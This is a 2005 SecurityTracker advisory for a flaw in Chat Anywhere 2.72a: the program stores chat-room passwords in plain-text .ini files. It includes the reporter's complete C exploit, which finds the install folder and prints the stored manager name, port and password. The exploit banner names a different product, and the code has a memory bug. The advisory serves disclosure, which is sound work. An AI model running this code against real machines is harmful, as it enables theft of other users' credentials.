SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Instant Messaging/IRC/Chat)  >   Chat Anywhere Vendors:   LionMax Software
Chat Anywhere Discloses Passwords to Local Users
SecurityTracker Alert ID:  1013270
SecurityTracker URL:  http://securitytracker.com/id/1013270
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 23 2005
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 2.72a
Description:   Kozan reported a vulnerability in Chat Anywhere. A local user can obtain passwords.

The software stores usernames and passwords in plain text form in the 'Program Files\Chat Anywhere\room\[chatroomname].ini' file. A local user can view the passwords.

Impact:   A local user can obtain passwords.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.lionmax.com/chatanywhere.htm (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Chat Anywhere v2.72a discloses passwords to local users.


---------------------
Application:
---------------------


Chat Anywhere v2.72a


---------------------
Introduction:
---------------------

Vendor: LionMax Software
http://www.lionmax.com/


---------------------
Bug:
---------------------


Chat Anywhere v2.72a stores all the usernames and passwords in
"Program Files\Chat Anywhere\room\xxxx.ini"
file with plain text format without crypting and can be viewed
by a local user.

xxxx is the chat room's name.


---------------------
Vendor Confirmed:
---------------------
No.


---------------------
Fix:
---------------------
There is no solution at the time of this entry.



---------------------
Exploit:
---------------------



/*****************************************************************

Chat Anywhere 2.72a Local Exploit by Kozan

Application: Chat Anywhere 2.72a
Vendor:LionMax Software
http://www.lionmax.com/

Vulnerable Description: Chat Anywhere 2.72a discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/


#include <windows.h>
#include <stdio.h>
#include <string.h>

#define BUFSIZE 100
HKEY hKey;
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

char *manage_port, *manage_name, *manage_password;

int adresal(char *FilePath,char *Str)
{
        char kr;
        int Sayac=0;
        int Offset=-1;
        FILE *di;
        di=fopen(FilePath,"rb");

        if( di == NULL )
        {
                fclose(di);
                return -1;
        }

        while(!feof(di))
        {
                Sayac++;
                for(int i=0;i<strlen(Str);i++)
                {
                        kr=getc(di);
                        if(kr != Str[i])
                        {
                                if( i>0 )
                                {
                                        fseek(di,Sayac+1,SEEK_SET);
                                }
                                break;
                        }
                        if( i > ( strlen(Str)-2 ) )
                        {
                                Offset = ftell(di)-strlen(Str);
                                fclose(di);
                                return Offset;
                        }
                }
        }
        fclose(di);
        return -1;
}


char *oku(char *FilePath,char *Str)
{

       FILE *di;
       char cr;
       int i=0;
       char Feature[500];

       int Offset = adresal(FilePath,Str);

       if( Offset == -1 )
               return "";

       if( (di=fopen(FilePath,"rb")) == NULL )
               return "";

       fseek(di,Offset+strlen(Str),SEEK_SET);

       while(!feof(di))
       {
               cr=getc(di);
               if(cr == 0x0D) break;

               Feature[i] = cr;
               i++;
       }

       Feature[i] = '\0';
       fclose(di);
       return Feature;
}


int main()
{
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                   "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                   0,
                   KEY_QUERY_VALUE,
                   &hKey) == ERROR_SUCCESS)
        {

                lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                               (LPBYTE) prgfiles, &dwBufLen);

        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
        {
                        RegCloseKey(hKey);
            printf("An error occured!\n");
            return 0;
        }

                RegCloseKey(hKey);

        }
        else
    {
        RegCloseKey(hKey);
        printf("An error occured!\n");
        return 0;
        }
        try{
        printf("WWW File Share Pro 2.72 Local Exploit by Kozan\n");
        printf("Credits to ATmaCA\n");
        printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
        printf("This exploit only shows the Demo1 room's password.\n");
        printf("You may improve it freely...\n\n");
    strcat(prgfiles,"\\Chat Anywhere\\room\\Demo1.ini");
        manage_port=oku(prgfiles,"ManagePort=");
        if(manage_port!="")        printf("Manage Port: %s\n",manage_port);
        manage_name=oku(prgfiles,"ManageName=");
        if(manage_name!="") printf("Manage Name: %s\n",manage_name);
        manage_password=oku(prgfiles,"ManagePassword=");
        if(manage_password!="") printf("Manage Password: %s\n",manage_password);
        }catch(...){printf("An error occured!\n"); return 0;}

        return 0;

}



Kozan...
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC